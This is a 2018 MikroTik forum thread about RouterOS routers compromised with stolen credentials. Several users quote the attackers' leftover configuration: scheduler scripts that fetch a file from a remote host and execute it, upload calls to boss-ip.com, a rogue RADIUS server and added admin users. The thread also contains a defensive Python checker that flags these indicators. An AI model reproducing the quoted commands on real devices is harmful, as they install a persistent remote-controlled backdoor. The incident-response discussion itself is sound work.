meth
newbie
Topic Author
Posts: 26
Joined: Tue Jan 17, 2006 7:24 pm
Location: Greece

S.O.S New vulnerability on 6.42.3 ????? NO

Sat Jun 16, 2018 10:11 am

Hi to all, a client called me that something was going wrong on his 1009 router, which is running the latest 6.42.3 version.
By logging in I found two dumped files in the files directory and a lot of changes in the configuration.
Any ideas???
 
nescafe2002
Forum Veteran
Posts: 897
Joined: Tue Aug 11, 2015 12:46 pm
Location: Netherlands

Re: S.O.S New vulnerability on 6.42.3 ?????

Sat Jun 16, 2018 10:43 am

Did you set a (strong) password on the device?
What is the firewall config?
Which services are enabled?
Is there any information in the log?

At least send your findings with supout.rif to support@mikrotik.com.
 
msatter
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: S.O.S New vulnerability on 6.42.3 ?????

Sat Jun 16, 2018 12:18 pm

 
bryanstorey
just joined
Posts: 1
Joined: Sun Jun 17, 2018 2:45 am

Re: S.O.S New vulnerability on 6.42.3 ?????

Sun Jun 17, 2018 2:59 am

Your story sounds similar to my own!
I saw one of my servers go offline which was depending on a NAT filter to get its proper external static IP.
Whatever it is, it goes in and adds: new admin users, PPP RADIUS connections, IP pools, scripts, masquerade rules to run every now and again and on startup, which verifies the infection of the device, re-infects it if not infected, and from what I can tell uploads it... somewhere... Not sure how it's getting in, but it's nasty.

I checked another Tick I know of and it was also affected...
By no coincidence I saw a service tech hanging out of the local large WISP core; he looked to be doing some "maintenance".

Below are some configs that were added by it.

This happened on RB2011 6.41.4 & 6.42.3
BST
add name=ip owner=admin policy=\
    reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
    url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=bdee03097da1df40&actio\
    n=upload&sncode=D26B162F4AE05A0DF07BB92B3480114A&dynamic=static\")}"
/system scheduler
add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
    ]=\"\") do={\r\
    \n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
    \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.\
    rif\r\
    \n}\r\
    \nexecute [/file get autosupout1.rif contents]" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-date=jan/01/1970 start-time=00:00:00
add interval=30m name=a on-event=ip policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-time=startup
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes
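A defender-side check for the indicators this post's config shows (identity renamed to test, a scheduler that fetches and executes a remote file, PPP authentication handed to an unknown RADIUS server, an extra full-rights user), written here as an added example and not code from the thread: it parses the text of a RouterOS /export and flags matching entries. The sample export is constructed for the example and uses a documentation address in place of the attacker's server.

```python
# Constructed sample /export, modelled on the entries quoted in this thread;
# 192.0.2.10 is a documentation address standing in for the real RADIUS server.
SAMPLE_EXPORT = r"""
/system identity
set name=test
/user
add name=Admin group=full
/system scheduler
add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
    ]=\"\") do={\r\
    \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.rif}" \
    policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
add interval=1d name=backup on-event="/system backup save" policy=read,write
/ppp aaa
set use-radius=yes
/radius
add address=192.0.2.10 secret=test service=ppp
/radius incoming
set accept=yes
"""

def parse_export(text):
    """Join backslash-continued lines; pair each add/set entry with its /section path.
    Simplification: any trailing backslash is treated as a line continuation."""
    entries, section, buf = [], None, ""
    for raw in text.splitlines():
        line, buf = buf + raw.strip(), ""
        if line.endswith("\\"):
            buf = line[:-1]          # continued on the next line
        elif line.startswith("/"):
            section = line           # new menu path, e.g. "/system scheduler"
        elif line:
            entries.append((section, line))
    return entries

# (kind, section, predicate on the lower-cased entry) for the indicators the thread describes
RULES = [
    ("identity-renamed", "/system identity", lambda e: "name=test" in e),
    ("remote-fetch", "/system scheduler", lambda e: "/tool fetch" in e or "execute" in e),
    ("remote-fetch", "/system script", lambda e: "/tool fetch" in e or "execute" in e),
    ("new-full-user", "/user", lambda e: e.startswith("add") and "group=full" in e),
    ("ppp-to-radius", "/ppp aaa", lambda e: "use-radius=yes" in e),
    ("radius-server", "/radius", lambda e: e.startswith("add")),
    ("radius-incoming", "/radius incoming", lambda e: "accept=yes" in e),
]

def audit(entries):
    """Return (kind, entry) pairs, in export order, for entries matching a rule."""
    return [(kind, line) for section, line in entries
            for kind, sec, hit in RULES if sec == section and hit(line.lower())]
```

Run it over the output of /export from a suspect router and compare the flagged entries against the configuration you actually deployed; a clean export yields an empty list.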
 
leopiri
just joined
Posts: 5
Joined: Fri May 08, 2009 9:25 am

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jun 18, 2018 12:48 am

I had the same problem: winbox port blocked except for the network provider, latest version and firmware, strong users and passwords. I noticed this on June 15 at 10pm. It is noteworthy that the winbox and web services were enabled; when I went to see, all services were enabled, and users who had read permission became full. This is disappointing, there is no way to get more secure with MikroTik, one security flaw after the other in the last 7 vulnerability patch versions.
 
strods
MikroTik Support
Posts: 1623
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jun 18, 2018 7:36 am

For the last few months we have been named as vulnerable, but most of the hacks used one and the same vulnerability that was patched already last year. After that we found out about a problem with Winbox that was patched on the same day, and versions with the patch were released on all RouterOS channels. So in total there were, and were fixed, two vulnerabilities. Hackers are using them again and again because many users still have not upgraded and/or fixed their configuration.

Regarding this problem in v6.42.3 - we have received a few reports about this problem, but it seems that a hacker who used the Winbox vulnerability in the past simply stored usernames and passwords and now was able to log into your router without hacking.

If you did change usernames and passwords recently while running on the latest RouterOS version and it still seems that you have been hacked, then please without any hesitation contact support@mikrotik.com and provide the supout file from your router (if possible, generate the file before you reboot the router).
 
opensourcecat
just joined
Posts: 12
Joined: Wed Mar 20, 2013 12:35 pm

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jun 18, 2018 2:15 pm

This is happening also to me. But the router is 2 hours flight away... any way to gain access again? I have it working and configuration seems to be untouched (vpn, eoip etc). It was updated to 6.41.3 exactly because of this vulnerability but it didn't help.
 
punkaker
just joined
Posts: 13
Joined: Thu Apr 12, 2018 7:26 pm

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jun 18, 2018 4:45 pm

Also happened to us on 4 routers; we found that the identity changed to "test" and then we saw all the changes in configuration.

Would appreciate an official note from MikroTik regarding this issue....
 
strods
MikroTik Support
Posts: 1623
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jun 18, 2018 5:04 pm

At the moment we have not received even one report about an actual new problem.

So far the problem with everyone who has contacted support was:

1) Router in the past was running a RouterOS version which had the Winbox vulnerability that allowed the hacker to download the router's user database;
2) Router was upgraded, but passwords were not changed and the firewall allowed access to specific enabled service/s;
3) Hacker now uses the passwords and usernames downloaded in the past and connects to routers in the normal way even though the router is upgraded.

Please make sure that your router's usernames and passwords have been changed after an upgrade to a version that has the Winbox vulnerability fix.
 
sid5632
Long time Member
Posts: 553
Joined: Fri Feb 17, 2017 6:05 pm

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jun 18, 2018 5:24 pm

It was updated to 6.41.3 exactly because of this vulnerability but it didn't help.
I believe 6.41.x doesn't have any vulnerability fix. You should be using 6.40.8 (or later in 6.40.x series - none yet) or 6.42.1 or later.
So it's not surprising that updating to 6.41.3 doesn't really help. Why pick that one anyway? It's a strange choice at that point in time.
 
carobeppe
just joined
Posts: 9
Joined: Tue Mar 26, 2013 6:09 pm

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jun 18, 2018 6:56 pm

Same problem here, routers updated to 6.42.3 before getting attacked. We noticed it happened only if the SSH service was enabled on the default port 22.
We found the system identity modified to Test, a scheduled task and a new user called Admin (with capital A).
 
anav
Forum Guru
Posts: 19107
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jun 18, 2018 7:00 pm

What the he...........
A. Why would you use the default port? The first thing I did after changing to SSH strong crypto was change the port to anything but the default.
B. Your system may have been hacked prior to your OS change ........ did you also change usernames and passwords when making the OS update??
 
evon69
just joined
Posts: 1
Joined: Fri Apr 20, 2018 9:01 pm

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jun 18, 2018 8:00 pm

Same problem on a lot of RouterOS devices, really strong password on every router. All the routers have the latest versions of packages and firmware; I've solved the problem by changing the default service ports and making the firewall rules stronger.
I understand we need to make security stronger ourselves, but if someone can access my router, run scripts etc. without knowing the password... I think MikroTik needs to consider THIS as a problem to solve!
 
mrz
MikroTik Support
Posts: 7042
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: S.O.S New vulnerability on 6.42.3 ?????

Tue Jun 19, 2018 11:05 am

Did you change passwords after you upgraded to latest version?
 
elbow
just joined
Posts: 9
Joined: Fri Oct 08, 2010 11:13 pm

Re: S.O.S New vulnerability on 6.42.3 ?????

Wed Jun 27, 2018 12:42 am

We got hit with this 2 weeks in a row. The first time they did not change the username and password. We did.
This time we can not log back into the router although it is still passing traffic.
Identity has changed to test.
Is there a normal username and password that this exploit uses that will allow us back into the router?
 
R1CH
Forum Guru
Posts: 1099
Joined: Sun Oct 01, 2006 11:44 pm

Re: S.O.S New vulnerability on 6.42.3 ?????

Wed Jun 27, 2018 1:40 am

Did you do a reinstall after being compromised? Winbox access can be escalated to shell access, where attackers can drop undetectable backdoors and other exploits. Changing passwords might be OK if you're lucky and didn't get hit by a sophisticated exploit, but reinstalling is the only truly safe option.
 
complete2006
Member Candidate
Posts: 254
Joined: Tue Feb 07, 2006 7:18 pm

Re: S.O.S New vulnerability on 6.42.3 ?????

Sun Jul 01, 2018 9:54 pm

Same here. Identity changed to test and user/password changed. The scan comes from address 62.112.107.230, located in Russia.
 
nescafe2002
Forum Veteran
Posts: 897
Joined: Tue Aug 11, 2015 12:46 pm
Location: Netherlands

Re: S.O.S New vulnerability on 6.42.3 ?????

Sun Jul 01, 2018 10:12 pm

Please share more than "same here"... it isn't helpful at all.

- Have you updated RouterOS? To which version?
- Have you changed the password since this update?
- Have you limited access to Winbox port 8291? If not, can you limit access to the Winbox port?

What do you mean by "scan"? Are there log messages indicating a brute-force attack? Could you share these messages?

Besides the above, could you send a supout.rif to support@mikrotik.com with your findings?
 
Zdenekhb
just joined
Posts: 10
Joined: Tue Apr 24, 2012 9:18 am

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jul 02, 2018 4:48 pm

HOW is it fixed?

We have the same problems on 6.42.4

Identity changed to TEST, a scheduler was created pointing to a script, and the script is:
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=36C41FDED4E28E2E3A81E3C9415ED21D&dynamic=static")  keep-result=no}
A new user admin is created, and an SSH link from Russia is opened :(

We tried a clean netinstall and set it back via export... after a few days it's the same situation...
We can't limit access via Winbox, but we have changed the SSH port to another number and allowed only the www, winbox and ssh services (it's a Hotspot machine).
 
strods
MikroTik Support
Posts: 1623
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jul 02, 2018 5:01 pm

We have received multiple reports where clients complain that their routers have been "hacked" while running a RouterOS version that has the Winbox vulnerability patch. In each and every one of these cases RouterOS usernames and passwords were not changed, or were changed before an upgrade - not after it. The hacker who stole access credentials simply goes through the hacked routers (while running the old version) and uses the same username and password. This means that the hacker logs into the router as a normal user.

- Upgrade RouterOS
- Change usernames and/or passwords after an upgrade (not before)
- Protect device with firewall configuration

If your device has been accessed by unknown user while running on the latest RouterOS version even if access credentials for all users have been changed, then please report to support@mikrotik.com as soon as possible.
 
normis
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: S.O.S New vulnerability on 6.42.3 ?????

Tue Jul 03, 2018 10:05 am

HOW is it fixed?

We have the same problems on 6.42.4

Identity changed to TEST, a scheduler was created pointing to a script, and the script is:
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=36C41FDED4E28E2E3A81E3C9415ED21D&dynamic=static")  keep-result=no}
A new user admin is created, and an SSH link from Russia is opened :(

We tried a clean netinstall and set it back via export... after a few days it's the same situation...
We can't limit access via Winbox, but we have changed the SSH port to another number and allowed only the www, winbox and ssh services (it's a Hotspot machine).
Anyone can change your config if they have your password. This is not a vulnerability. They got your password before, not now.
 
lonthong
just joined
Posts: 8
Joined: Sun Apr 01, 2007 10:27 am
Location: ngalam

Re: S.O.S New vulnerability on 6.42.3 ?????

Sat Jul 21, 2018 7:50 am

Same problem here..
RB 2011UiAS v6.42.5

I did:

1. /system reset and reconfig
2. change ssh and winbox ports
3. change login user and password after /system reset and reconfig
but after a few days similar things happen again.

Waiting patiently for good news from MikroTik support.
 
normis
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: S.O.S New vulnerability on 6.42.3 ?????

Mon Jul 23, 2018 2:46 pm

Please provide some proof that it actually happened after 6.42.1, where the issue was fixed. Post your log and config. You are welcome to email them to support @ mikrotik.com if you like.
 
tachyonnoc
just joined
Posts: 4
Joined: Fri Nov 03, 2017 12:45 pm

Re: S.O.S New vulnerability on 6.42.3 ?????

Wed Jul 25, 2018 12:57 pm

It is even happening on 6.42.5.
Identity changing to 'test'
Adding PPP servers
Adding a masquerade rule
Enabling Telnet and SSH
Enabling admin
When I checked, it was showing 300+ admin in active sessions on my CCR1036 running 6.42.5, and it's happening again and again.

Please provide a solution for it.
 
normis
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: S.O.S New vulnerability on 6.42.3 ?????

Wed Jul 25, 2018 1:07 pm

It is even happening on 6.42.5.
Identity changing to 'test'
Adding PPP servers
Adding a masquerade rule
Enabling Telnet and SSH
Enabling admin
When I checked, it was showing 300+ admin in active sessions on my CCR1036 running 6.42.5, and it's happening again and again.

Please provide a solution for it.
If somebody has your password, it doesn't matter what software you are running. Like suggested before, reinstall AFTER upgrade, and you must change the password AFTER upgrade.
 
hongjie
just joined
Posts: 2
Joined: Wed Mar 06, 2013 7:38 am

Re: S.O.S New vulnerability on 6.42.3 ?????

Sun Jul 29, 2018 11:34 am

We have CCR1036s running in our network.
And last week we found a CCR1036 was hacked; it had version 6.38 and the log showed an IP from Russia hacked it and logged in via the API port.

The hacker left a message in a comment asking us to send money to his Bitcoin account. It's good that he didn't change the password and only blocked access from the Internet, so we can access it through the local LAN.

And today I found another device running 6.24.5 was hacked, and this time they changed my password and I cannot log in. And the entity name was changed to test.
I am looking for ways to access it, but no luck. I'm not sure if I can access it through the console.
 
normis
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: S.O.S New vulnerability on 6.42.3 ?????  [SOLVED]

Mon Jul 30, 2018 8:22 am

We have CCR1036s running in our network.
And last week we found a CCR1036 was hacked; it had version 6.38 and the log showed an IP from Russia hacked it and logged in via the API port.

The hacker left a message in a comment asking us to send money to his Bitcoin account. It's good that he didn't change the password and only blocked access from the Internet, so we can access it through the local LAN.

And today I found another device running 6.24.5 was hacked, and this time they changed my password and I cannot log in. And the entity name was changed to test.
I am looking for ways to access it, but no luck. I'm not sure if I can access it through the console.
You answered your own post. You are using vulnerable versions everywhere, with free access from the internet. Why waste time posting here? Upgrade + change password!
If you can't access it, reinstall it.

Remember:

1. Upgrade to 6.42.3
2. Change password
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
